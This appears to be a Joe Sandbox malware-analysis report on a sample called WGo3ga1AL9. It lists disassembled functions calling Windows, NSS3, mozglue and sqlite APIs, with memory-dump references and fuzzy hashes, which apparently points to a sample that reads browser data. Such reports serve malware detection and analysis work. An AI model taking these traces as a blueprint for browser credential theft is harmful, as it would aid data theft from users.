                                                                                                                                              • wsprintfA.USER32 ref: 00417B83
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1243822799-0
                                                                                                                                              • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                                                                                                                              • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                                                                                                                              • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                                                                                                                              • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                                                                                                                              Function 6C7AAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C795F17,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AAC94
                                                                                                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C795F17,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AACA6
                                                                                                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AACC0
                                                                                                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AACDB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3989322779-0
                                                                                                                                              • Opcode ID: 355a38cc2d5007a6b1b42fe29750a507eb8cd9a53574023d6ea0680cb764b673
                                                                                                                                              • Instruction ID: dddb0bd592c1e017789004502491cd4c7a11969aa689376409f6949ff5b5572c
                                                                                                                                              • Opcode Fuzzy Hash: 355a38cc2d5007a6b1b42fe29750a507eb8cd9a53574023d6ea0680cb764b673
                                                                                                                                              • Instruction Fuzzy Hash: FE015EB5601B01ABE7A0DF69DA08753B7E8BF04669B504939E85AC3E00E735F055CFD1
                                                                                                                                              Function 6C711DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C711DFB
                                                                                                                                                • Part of subcall function 6C7095B0: TlsGetValue.KERNEL32(00000000,?,6C7200D2,00000000), ref: 6C7095D2
                                                                                                                                                • Part of subcall function 6C7095B0: EnterCriticalSection.KERNEL32(?,?,?,6C7200D2,00000000), ref: 6C7095E7
                                                                                                                                                • Part of subcall function 6C7095B0: PR_Unlock.NSS3(?,?,?,?,6C7200D2,00000000), ref: 6C709605
                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6C711E09
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90AB
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90C9
                                                                                                                                                • Part of subcall function 6C7C9090: EnterCriticalSection.KERNEL32 ref: 6C7C90E5
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C9116
                                                                                                                                                • Part of subcall function 6C7C9090: LeaveCriticalSection.KERNEL32 ref: 6C7C913F
                                                                                                                                                • Part of subcall function 6C70E190: PR_EnterMonitor.NSS3(?,?,6C70E175), ref: 6C70E19C
                                                                                                                                                • Part of subcall function 6C70E190: PR_EnterMonitor.NSS3(6C70E175), ref: 6C70E1AA
                                                                                                                                                • Part of subcall function 6C70E190: PR_ExitMonitor.NSS3 ref: 6C70E208
                                                                                                                                                • Part of subcall function 6C70E190: PL_HashTableRemove.NSS3(?), ref: 6C70E219
                                                                                                                                                • Part of subcall function 6C70E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C70E231
                                                                                                                                                • Part of subcall function 6C70E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C70E249
                                                                                                                                                • Part of subcall function 6C70E190: PR_ExitMonitor.NSS3 ref: 6C70E257
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C711E37
                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6C711E4A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 499896158-0
                                                                                                                                              • Opcode ID: 782ca23e0ab7739977a2817bea0a116cfcc2ce3d2aab8e6c3faa0c76a7329462
                                                                                                                                              • Instruction ID: aac7fab259d5fa0f650a2531237af3a1df5640a0f716ce445837d3c94fccfe13
                                                                                                                                              • Opcode Fuzzy Hash: 782ca23e0ab7739977a2817bea0a116cfcc2ce3d2aab8e6c3faa0c76a7329462
                                                                                                                                              • Instruction Fuzzy Hash: 4F01F771B441519BEB104BA6DE0CF5277B8AB61B4EF180031E5189FF91E731E818CBD6
                                                                                                                                              Function 6C711D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C711D75
                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C711D89
                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000010), ref: 6C711D9C
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C711DB8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_Util$Errorfree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 939066016-0
                                                                                                                                              • Opcode ID: 0ef2fb386726250696bae3a46c08997f05da2ef7b4e49e484b7d8bc3cd53ff9e
                                                                                                                                              • Instruction ID: 7122b7585fc5d74c4dd185de005e5b396e0110d283506177720ac61629f9e657
                                                                                                                                              • Opcode Fuzzy Hash: 0ef2fb386726250696bae3a46c08997f05da2ef7b4e49e484b7d8bc3cd53ff9e
                                                                                                                                              • Instruction Fuzzy Hash: 23F049B261961057FB105E5A9E47B8736489BA1798F190335DD888FF40D760E404C2E5
                                                                                                                                              Function 6C75FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C709003,?), ref: 6C75FD91
                                                                                                                                                • Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
                                                                                                                                                • Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15
                                                                                                                                              • PORT_Alloc_Util.NSS3(A4686C76,?), ref: 6C75FDA2
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,12D068C3,A4686C76,?,?), ref: 6C75FDC4
                                                                                                                                              • free.MOZGLUE(00000000,?,?), ref: 6C75FDD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2335489644-0
                                                                                                                                              • Opcode ID: 09dd1eaa694b1560989175d93c253b12e8333eb3311d70b17e9e38e7463c12bf
                                                                                                                                              • Instruction ID: ab5321a4dd9d081508a781fb4cb437d7fde1cdc03664c6e57a64f518a62a3f8e
                                                                                                                                              • Opcode Fuzzy Hash: 09dd1eaa694b1560989175d93c253b12e8333eb3311d70b17e9e38e7463c12bf
                                                                                                                                              • Instruction Fuzzy Hash: F3F0C8F56013065BEB005F55DE959177758EF45299B548035ED0DCBF02EB21D824C7E1
                                                                                                                                              Function 6C81CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalDeleteSectionfree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2988086103-0
                                                                                                                                              • Opcode ID: bd922545a47d3610b102a669188b6c9648e0c4e57139a97c94e69bb9a23f43bd
                                                                                                                                              • Instruction ID: 4405696c95788373b973b4aa5366219c2e96f894a17002240ccce743ce4b989a
                                                                                                                                              • Opcode Fuzzy Hash: bd922545a47d3610b102a669188b6c9648e0c4e57139a97c94e69bb9a23f43bd
                                                                                                                                              • Instruction Fuzzy Hash: 65E030B6B00608ABCA50EFA9DC4488677ACEE4D2747150535E691C3701D235F905CFE1
                                                                                                                                              Function 6C6F9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_value_text.NSS3 ref: 6C6F9E1F
                                                                                                                                                • Part of subcall function 6C6B13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C682352,?,00000000,?,?), ref: 6C6B1413
                                                                                                                                                • Part of subcall function 6C6B13C0: memcpy.VCRUNTIME140(00000000,R#hl,00000002,?,?,?,?,6C682352,?,00000000,?,?), ref: 6C6B14C0
                                                                                                                                              Strings
                                                                                                                                              • LIKE or GLOB pattern too complex, xrefs: 6C6FA006
                                                                                                                                              • ESCAPE expression must be a single character, xrefs: 6C6F9F78
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                              • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                              • API String ID: 2453365862-264706735
                                                                                                                                              • Opcode ID: 4826e1786757bb19d57efededf3e1e11b6039eaf8b294f1df64b0db47ddada08
                                                                                                                                              • Instruction ID: 4ed2eb40af236c7d4b812daa5bb72f625ffd2277c2d5f3f62a21a20418aff8e7
                                                                                                                                              • Opcode Fuzzy Hash: 4826e1786757bb19d57efededf3e1e11b6039eaf8b294f1df64b0db47ddada08
                                                                                                                                              • Instruction Fuzzy Hash: 60811A70A052514BE704CF29C4903E9B7F3AF8532CF288659D8B88BB95D736D847C795
                                                                                                                                              Function 6C754D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C754D57
                                                                                                                                              • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C754DE6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorR_snprintf
                                                                                                                                              • String ID: %d.%d
                                                                                                                                              • API String ID: 2298970422-3954714993
                                                                                                                                              • Opcode ID: 6cf5cc70364a5d75e99ae517bcb7fd98d46a23d79f44b19745aad4c3ab856e34
                                                                                                                                              • Instruction ID: 2a6d8963d7f2373c784b8bde6866584dc06519c56ebc567939a956425d12ccc3
                                                                                                                                              • Opcode Fuzzy Hash: 6cf5cc70364a5d75e99ae517bcb7fd98d46a23d79f44b19745aad4c3ab856e34
                                                                                                                                              • Instruction Fuzzy Hash: A2310CB2D003186BEB109BA19D0ABFF7768EF40308F440429ED1957781EF349929CBE1
                                                                                                                                              Function 6C774CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3('8wl,00000000,00000000,?,?,6C773827,?,00000000), ref: 6C774D0A
                                                                                                                                                • Part of subcall function 6C760840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7608B4
                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C774D22
                                                                                                                                                • Part of subcall function 6C75FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C701A3E,00000048,00000054), ref: 6C75FD56
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                              • String ID: '8wl
                                                                                                                                              • API String ID: 1521942269-312688369
                                                                                                                                              • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                              • Instruction ID: 54630a2ea6ac97f87f981392ceb2be07dd9eb62f141903e670ff369d3e8cb4ee
                                                                                                                                              • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                              • Instruction Fuzzy Hash: FAF06232601229A7EF204D6EAF85B4336DC9B4167DF1402B1EE68CB781E621CC049AB1
                                                                                                                                              Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileNextlstrcat
                                                                                                                                              • String ID: q?A
                                                                                                                                              • API String ID: 3840410801-4084695119
                                                                                                                                              • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                                                                                                                              • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                                                                                                                              • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                                                                                                                              • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55
                                                                                                                                              Function 6C760DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$calloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3339632435-0
                                                                                                                                              • Opcode ID: 0b8f6c28ea62eabf00fc86ac4c1a4974c407677279c77976ff2d28d756b74744
                                                                                                                                              • Instruction ID: 96f0fec2b1f4a9684ce915dc9fc8fdd385de3ebf36ec2019fbfb75a5fb641d06
                                                                                                                                              • Opcode Fuzzy Hash: 0b8f6c28ea62eabf00fc86ac4c1a4974c407677279c77976ff2d28d756b74744
                                                                                                                                              • Instruction Fuzzy Hash: 5D31A3B06443A18BDB117F7ACA4526977B8BF0630CF114679DC9987E21DB349485CBCA